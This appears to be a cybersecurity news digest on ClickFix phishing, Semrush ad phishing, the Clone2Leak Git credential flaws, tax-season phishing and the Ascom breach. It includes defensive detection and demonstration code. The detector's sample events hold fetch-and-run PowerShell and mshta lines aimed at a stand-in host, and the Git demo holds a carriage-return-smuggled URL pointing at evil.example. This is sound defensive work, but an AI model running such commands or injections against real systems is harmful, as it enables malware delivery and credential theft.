CyberSecurity news

FlagThis - #credentialtheft

Microsoft Threat@Microsoft Security Blog //
Microsoft Threat Intelligence has identified an ongoing phishing campaign that impersonates Booking.com and targets hospitality employees with credential-stealing malware. The campaign began in December 2024 and was still active as of February 2025. The emails go to employees likely to work with Booking.com at organizations in North America, Oceania, South and Southeast Asia, and Europe, and use a social engineering technique called ClickFix to deliver the malware. The goal is financial fraud and theft through compromised employee credentials.

ClickFix presents a fake error message or verification prompt that instructs the user to "fix" the problem by copying a command and pasting it, typically into the Windows Run dialog, so that the victim launches the malware download themselves. Because the user, not an attachment or a download link, executes the command, the delivery step sidesteps the mail-filtering and browser protections that would normally catch it. The phishing emails vary in content, citing negative guest reviews, requests from prospective guests, online promotion opportunities, and account verification to induce clicks. The threat actor, tracked as Storm-1865, has evolved its tactics to bypass security measures.
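The pattern the paragraph describes leaves a recognisable trace in endpoint telemetry: a command-line interpreter or script host started by explorer.exe (the parent of anything launched from the Run dialog) whose command line fetches and runs something remote. The following detector is an added example written for this page, not Microsoft's detection logic; it scores constructed process-creation records (a simplified Sysmon Event ID 1 shape, parent image | image | command line, with invented hostnames under the reserved .invalid TLD) and flags those that fit the ClickFix shape.

```python
"""ClickFix-style execution detector over constructed process-creation events.

Added example, not Microsoft's detection logic. The sample records are constructed
in a simplified Sysmon Event ID 1 shape (parent image | image | command line) and
are not real telemetry; hostnames use the reserved .invalid TLD.
"""
import re
from typing import List, NamedTuple, Tuple

# Interpreters and living-off-the-land binaries a pasted one-liner usually runs in.
INTERPRETERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.I)
DOWNLOAD_EXEC = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadstring|iex|invoke-expression|"
    r"start-bitstransfer|-urlcache|mshta)\b", re.I)
HIDDEN_FLAGS = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|-nop\b)", re.I)
# Cosmetic text the fake prompt appends so the pasted line "looks" like a verification step.
CLICKFIX_BAIT = re.compile(r"(?:not a robot|captcha|verification id|human verification)", re.I)

# Constructed sample events: parent image | image | command line
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta https://cdn.example.invalid/verify.hta",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -w hidden -ep bypass -c iwr https://cdn.example.invalid/a | iex",
    r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|C:\Windows\System32\notepad.exe|notepad.exe",
    r"C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd /c echo hello",
    r'C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|'
    r'powershell -c "iwr https://cdn.example.invalid/x | iex" # "I am not a robot - reCAPTCHA Verification ID: 4823"',
]


class Event(NamedTuple):
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> Event:
    # Split on the first two pipes only: a PowerShell pipeline inside the command line must survive.
    parent, image, cmdline = (f.strip() for f in line.split("|", 2))
    return Event(parent, image, cmdline)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Event) -> Tuple[int, List[str]]:
    """Return (score, reasons). A score of 3 or more is treated as a ClickFix candidate."""
    reasons: List[str] = []
    # The whole pattern hinges on a user-driven launch: interpreter with explorer.exe as parent.
    if not (basename(ev.parent) == "explorer.exe" and basename(ev.image) in INTERPRETERS):
        return 0, reasons
    score = 1
    reasons.append("interpreter launched from explorer.exe (Run dialog or console)")
    if REMOTE_URL.search(ev.cmdline):
        score += 1; reasons.append("remote URL on command line")
    if DOWNLOAD_EXEC.search(ev.cmdline):
        score += 1; reasons.append("download-and-execute primitive")
    if HIDDEN_FLAGS.search(ev.cmdline):
        score += 1; reasons.append("hidden window / execution-policy bypass flags")
    if CLICKFIX_BAIT.search(ev.cmdline):
        score += 2; reasons.append("CAPTCHA / verification bait text in command line")
    return score, reasons


def detect(lines: List[str], threshold: int = 3) -> List[Tuple[int, int, List[str]]]:
    """Return (index, score, reasons) for every event at or above the threshold."""
    hits = []
    for i, line in enumerate(lines):
        score, reasons = score_event(parse_event(line))
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for idx, score, reasons in detect(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}: {'; '.join(reasons)}")
```

The benign explorer.exe -> cmd.exe record scores 1 and is not reported, which is the point of scoring rather than matching on the parent alone: users legitimately launch shells from the Run dialog, but rarely ones that pull and execute content from a remote URL.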

Recommended read:
References :
  • krebsonsecurity.com: Booking.com Phishers May Leave You With Reservations
  • Source Asia: Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware
  • The DefendOps Diaries: Understanding the ClickFix Phishing Threat to the Hospitality Industry
  • The Hacker News: Microsoft Warns of ClickFix Phishing Campaign Targeting Hospitality Sector via Fake Booking[.]com Emails
  • ‘ClickFix’ Phishing Scam Impersonates Booking.com to Target Hospitality
  • The Record: Cybercriminals are sending malicious emails to hospitality employees who are likely to work with Booking.com
  • bsky.app: Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
  • The Register - Security: That 'angry guest' email from Booking.com? It's a scam, not a 1-star review
  • www.techradar.com: Microsoft warns about a new phishing campaign impersonating Booking.com
  • TARNKAPPE.INFO: ClickFix-Phishing: Neue Kampagne richtet sich gegen die Hotellerie
  • Virus Bulletin: Microsoft researchers identified a phishing campaign (Storm-1865) that uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft.
  • BleepingComputer: Microsoft warns that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
  • Email Security - Blog: "ClickFix" Phishing Impersonation Campaign Targets Hospitality Sector
  • eSecurity Planet: Phishing Campaign Impersonates Booking.com, Plants Malware
  • Security Risk Advisors: Microsoft Detects Ongoing Phishing Impersonation of Booking.com Using “ClickFix” to Deliver Credential-Stealing Malware
  • Blog: Phishing campaign impersonates Booking.com, plants malware
  • Davey Winder: Booking.com CAPTCHA attack impacts customers—but systems not breached, a spokesperson has said.
  • www.computerworld.com: Description of the ClickFix phishing campaign targeting the hospitality industry via fake Booking.com emails.
  • www.cysecurity.news: A phishing campaign impersonates Booking.com, targeting organizations in hospitality, using the ClickFix method to spread credential-stealing malware.
  • www.cybersecurity-insiders.com: Malware Impersonating Booking.com Targets Hospitality Sector
  • thecyberexpress.com: Microsoft Detects Ongoing Phishing Impersonation of Booking.com Using “ClickFix” to Deliver Credential-Stealing Malware
  • securityonline.info: Booking.com Impersonated in Phishing Campaign Delivering Credential-Stealing Malware
  • gbhackers.com: Microsoft Threat Intelligence has identified an ongoing phishing campaign that began in December 2024, targeting organizations in the hospitality industry by impersonating the online travel agency Booking.com. The campaign, tracked as Storm-1865, employs a sophisticated social engineering technique called ClickFix to deliver credential-stealing malware designed to conduct financial fraud and theft. This attack specifically targets
  • Metacurity: The attackers are impersonating Booking.com to deliver credential-stealing malware.
  • Talkback Resources: Storm-1865 Impersonates Booking.com in Phishing Scheme
  • Blog: Storm-1865 leverages ‘ClickFix’ technique in new phishing campaign

@The DefendOps Diaries //
Cybercriminals are targeting SEO professionals through a phishing campaign that abuses Google Ads. The attackers buy fake Semrush advertisements that lead users to deceptive login pages built to steal their Google account credentials. The campaign is a new twist on search-ad phishing: it goes after users of the Semrush SaaS platform, which is popular among SEO professionals and businesses and, by Semrush's own count, is used by 40% of Fortune 500 companies.

The scheme works because SEO professionals trust Semrush, a platform used for advertising and market research. The malicious ads appear when users search for Semrush and redirect them to counterfeit login pages on domains registered to closely resemble real Semrush domains. The only sign-in option offered is "Log in with Google", so what the page harvests is the victim's Google account, not a Semrush password. That account gives the attackers access to Google Analytics and Google Search Console, with insight into the company's business performance, and can be reused for further malvertising and data theft.
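The page does not list the lookalike domains, so the check below is an added example rather than anything from Malwarebytes or Semrush: a triage routine that, given a brand's legitimate registrable domains (assumed here to be just semrush.com), flags hostnames that either tuck the brand name into a subdomain of some other domain or use a second-level label within a small edit distance of the brand after folding common homoglyph substitutions (rn for m, 0 for o, and so on). The sample hostnames are constructed for illustration.

```python
"""Lookalike-domain triage for brand impersonation in ad landing pages.

Added example, not Malwarebytes' or Semrush's tooling. All hostnames below are
constructed for illustration; LEGIT_DOMAINS is an assumption for the demo.
"""
from typing import Dict, List, Tuple

BRAND = "semrush"
LEGIT_DOMAINS = {"semrush.com"}  # assumption: the brand's real registrable domains

# Substitutions attackers use because the result renders almost identically.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"),
              ("5", "s"), ("-", ""), ("_", "")]


def fold(label: str) -> str:
    """Collapse homoglyph digraphs/characters so 'sernrush' compares as 'semrush'."""
    for src, dst in HOMOGLYPHS:
        label = label.replace(src, dst)
    return label


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert, delete, substitute), single-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(hostname: str) -> Tuple[str, List[str]]:
    """Return (registrable domain, subdomain labels).

    Assumption: the registrable domain is the last two labels. That ignores multi-part
    public suffixes such as co.uk; a production check should consult the Public Suffix List.
    """
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def classify(hostname: str, max_distance: int = 2) -> Tuple[str, str]:
    """Return (verdict, reason): 'legitimate', 'suspicious' or 'unrelated'."""
    reg, subs = registrable(hostname)
    if reg in LEGIT_DOMAINS:
        return "legitimate", reg
    # Brand name used as a subdomain of somebody else's domain: semrush.accounts-check.com
    if any(BRAND in fold(s) for s in subs):
        return "suspicious", f"brand name in subdomain of {reg}"
    sld = reg.split(".")[0]
    folded = fold(sld)
    # Brand embedded in, or homoglyph-equivalent to, the registrable label: sernrush.com, semrush-login.com
    if BRAND in folded:
        return "suspicious", f"registrable label {sld!r} folds to or contains {BRAND!r}"
    # Typo-squat within a couple of edits: semrsuh.com
    distance = levenshtein(folded, BRAND)
    if distance <= max_distance:
        return "suspicious", f"{sld!r} is within edit distance {distance} of {BRAND!r}"
    return "unrelated", reg


def triage(hostnames: List[str]) -> Dict[str, Tuple[str, str]]:
    return {h: classify(h) for h in hostnames}


SAMPLE_HOSTS = [  # constructed
    "login.semrush.com", "sernrush.com", "semrush-login.com", "semrsuh.com",
    "semrush.accounts-check.com", "google.com",
]

if __name__ == "__main__":
    for host, (verdict, reason) in triage(SAMPLE_HOSTS).items():
        print(f"{host:30} {verdict:12} {reason}")
```

The order of the checks matters: an allowlisted registrable domain wins outright so that login.semrush.com is never flagged, while the subdomain test runs before the edit-distance test because "semrush" as a subdomain of an unrelated domain is the classic ad-landing-page trick and should be called out as such rather than as a near-miss spelling.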

Recommended read:
References :
  • The DefendOps Diaries: Cybercriminals exploit Google Ads to target SEO pros, using fake Semrush ads to steal Google credentials.
  • Help Net Security: Malicious ads target Semrush users to steal Google account credentials
  • Malwarebytes: Semrush impersonation scam hits Google Ads
  • www.tripwire.com: Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users
  • BleepingComputer: A new phishing campaign is targeting SEO professionals with malicious Semrush Google Ads that aim to steal their Google account credentials.
  • bsky.app: Fake Semrush ads used to steal SEO professionals’ Google accounts
  • Threat actors are looking to compromise Google accounts to further malvertising and data theft
  • Email Security - Blog: Cyber criminals have launched a sophisticated phishing campaign that exploits the trusted reputation of Semrush, an SEO firm that counts Fortune 500 brands among its customers, to compromise Google account credentials.
  • gbhackers.com: Hackers Deploy Fake Semrush Ads to Steal Google Account Credentials

Pierluigi Paganini@securityaffairs.com //
Multiple vulnerabilities have been disclosed in Git-related tools that put users' stored credentials at risk. The flaws stem from improper handling of message delimiters in the Git Credential Protocol, the line-based key=value exchange between Git and its credential helpers, and affect GitHub Desktop, Git Credential Manager, Git LFS, GitHub CLI, and GitHub Codespaces. A malicious repository can supply a URL carrying an injected carriage return or newline, which the affected tool passes on to the helper, so that the helper looks up and returns credentials for a host the attacker controls. CVE-2025-23040 in GitHub Desktop, for example, allowed "carriage return smuggling" through crafted submodule URLs.

The vulnerabilities arise from the gap between Git's own strict handling of the protocol and the looser implementations in related projects. Git Credential Manager reads helper input with .NET's StreamReader, which treats a lone carriage return as a line ending, so a single value containing `\r` is read as two lines. Git LFS does not check for embedded control characters at all, so a crafted HTTP URL can inject a carriage return/line feed pair. In both cases the injected text becomes a second `host=` line, and since later keys override earlier ones the helper answers for the attacker's host. Git has since introduced the configuration setting `credential.protectProtocol`, which makes Git itself reject credential values that contain a carriage return, as a defense-in-depth measure independent of the individual helper fixes.
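The mechanics are easiest to see with a small model of the protocol. The code below is an added example, not Git's or any helper's code: it builds a helper request from a URL (assuming, for illustration, that the caller percent-decodes the host, which is what turns a `%0d` in the URL into a raw carriage return), serializes it with or without a `credential.protectProtocol`-style check, and then parses the wire bytes with a lenient reader that ends lines at `\r`, `\n` or `\r\n` (the .NET StreamReader.ReadLine behaviour) beside a strict reader that only ends lines at `\n`. The attacker URL and host names are constructed.

```python
"""CR smuggling against a model of the Git Credential Protocol.

Added example, not Git's own code or that of any credential helper. The protocol is
modelled as 'key=value\\n' lines ended by a blank line, which is its real shape; the
percent-decoding of the host in request_from_url is an assumption made so the demo
can show how a %0d in a URL becomes a raw carriage return.
"""
from typing import Dict, Optional
from urllib.parse import unquote

# Constructed URLs. evil.example uses the reserved .example TLD.
BENIGN_URL = "https://github.com/victim/repo.git"
ATTACK_URL = "https://github.com%0dhost=evil.example/victim/repo.git"


def request_from_url(url: str) -> Dict[str, str]:
    """Attributes a helper would be asked about for `url` (assumes the host is percent-decoded)."""
    scheme, rest = url.split("://", 1)
    netloc, _, path = rest.partition("/")
    return {"protocol": scheme, "host": unquote(netloc), "path": path}


def serialize(attrs: Dict[str, str], protect_protocol: bool = True) -> str:
    """Encode attrs as protocol lines plus the blank terminator.

    A newline in a value is always refused, as Git has long done; refusing a carriage
    return as well is the intent of Git's credential.protectProtocol setting.
    """
    out = []
    for key, value in attrs.items():
        if "\n" in value or (protect_protocol and "\r" in value):
            raise ValueError(f"control character in credential attribute {key!r}")
        out.append(f"{key}={value}\n")
    return "".join(out) + "\n"


def parse_lenient(wire: str) -> Dict[str, str]:
    """Reader that accepts \\r, \\n or \\r\\n as a line ending (StreamReader.ReadLine style)."""
    attrs: Dict[str, str] = {}
    for line in wire.replace("\r\n", "\n").replace("\r", "\n").split("\n"):
        if line == "":
            break  # blank line ends the request
        key, _, value = line.partition("=")
        attrs[key] = value  # later keys override earlier ones, as in the real protocol
    return attrs


def parse_strict(wire: str) -> Dict[str, str]:
    """Reader that ends lines only at \\n and refuses a stray carriage return."""
    attrs: Dict[str, str] = {}
    for line in wire.split("\n"):
        if line == "":
            break
        if "\r" in line:
            raise ValueError("carriage return inside credential line")
        key, _, value = line.partition("=")
        attrs[key] = value
    return attrs


def resolve_host(url: str, protect_protocol: bool, strict_helper: bool) -> Optional[str]:
    """Host the helper ends up serving credentials for, or None if the request is rejected."""
    try:
        wire = serialize(request_from_url(url), protect_protocol=protect_protocol)
        parsed = parse_strict(wire) if strict_helper else parse_lenient(wire)
    except ValueError:
        return None
    return parsed.get("host")


if __name__ == "__main__":
    for protect, strict in [(False, False), (True, False), (False, True), (True, True)]:
        print(f"protectProtocol={protect!s:5} strict helper={strict!s:5} -> "
              f"{resolve_host(ATTACK_URL, protect, strict)}")
```

With both protections off, the helper is asked for credentials for evil.example although the user cloned from github.com; enabling either the Git-side check or a strict helper reader makes the request fail closed, which is why the fix landed on both sides.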

Recommended read:
References :
  • Cyber Security News: Critical GitHub Flaw Allows Credential Leaks Through Malicious Repos
  • securityaffairs.com: Multiple Git flaws led to credentials compromise
  • The Hacker News: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
  • cyberpress.org: Critical GitHub Flaw Allows Credential Leaks Through Malicious Repos
  • ciso2ciso.com: Multiple Git flaws led to credentials compromise – Source: securityaffairs.com
  • ciso2ciso.com: Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user’s Git credentials. “Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper,” GMO Flatt Security […]
  • ciso2ciso.com: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs – Source:thehackernews.com
  • discuss.privacyguides.net: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
  • Pyrzout :vm:: Multiple Git flaws led to credentials compromise – Source: securityaffairs.com
  • Dataconomy: Clone2Leak exposes credential risks in Git ecosystem
  • BleepingComputer: A set of three distinct but related attacks, dubbed 'Clone2Leak,' can leak credentials by exploiting how Git and its credential helpers handle authentication requests.
  • www.bleepingcomputer.com: News about Clone2Leak vulnerabilities in the Git ecosystem.

stclarke@Source //
Microsoft is warning of a surge in tax-themed phishing campaigns exploiting the upcoming tax season to steal credentials and deploy malware. These campaigns leverage various social engineering tactics, including malicious hyperlinks and attachments. Attackers are using IRS lures, QR codes, and other redirection techniques to trick victims into revealing sensitive information or installing malware.

These campaigns use malicious hyperlinks and attachments to deliver credential phishing and malware including RaccoonO365, AHKBot, Latrodectus, BruteRatel C4 (BRc4), GuLoader, and Remcos. Redirection methods, such as URL shorteners and QR codes, are used to evade detection, along with the abuse of legitimate services like file-hosting sites.

Microsoft observed campaigns employing fake tax verification forms with embedded links, PDF attachments containing QR codes, redirects hosted on compromised websites, and abused cloud services. One campaign observed on February 6, 2025 targeted US users with IRS-themed emails containing PDF attachments. These attachments redirected victims to fake DocuSign sites ultimately delivering BRc4 and Latrodectus malware.

Recommended read:
References :
  • The Hacker News: Microsoft Warns of Tax-Themed Email Attacks Using PDFs and QR Codes to Deliver Malware
  • Source: Threat actors leverage tax season to deploy tax-themed phishing campaigns
  • Vulnerable U: Tax Season Phishing 2025 - Full Threat Breakdown
  • VERITI: Veriti Research has identified a significant rise in tax-related malware samples across multiple platforms. The research team discovered malware samples targeting Android, Linux, and Windows, all connected to the same adversary operating from a single IP address.

Sam Bent@Sam Bent //
Ascom, a Swiss provider of healthcare and enterprise communication systems, has confirmed a cyberattack on its IT infrastructure. The intrusion, attributed to the Hellcat group, targeted the company's Jira servers; Ascom said the attackers breached its technical ticketing system.

Hellcat claimed responsibility and said it stole approximately 44 GB of data, potentially affecting all of Ascom's divisions. The group is known for getting into Jira instances with compromised credentials rather than novel exploits, a pattern that has led to data breaches at several other organizations. The usual advice applies: enforce multi-factor authentication on Jira and other internet-facing ticketing systems, audit accounts and access regularly, patch promptly, and train employees to recognise credential phishing.

Recommended read:
References :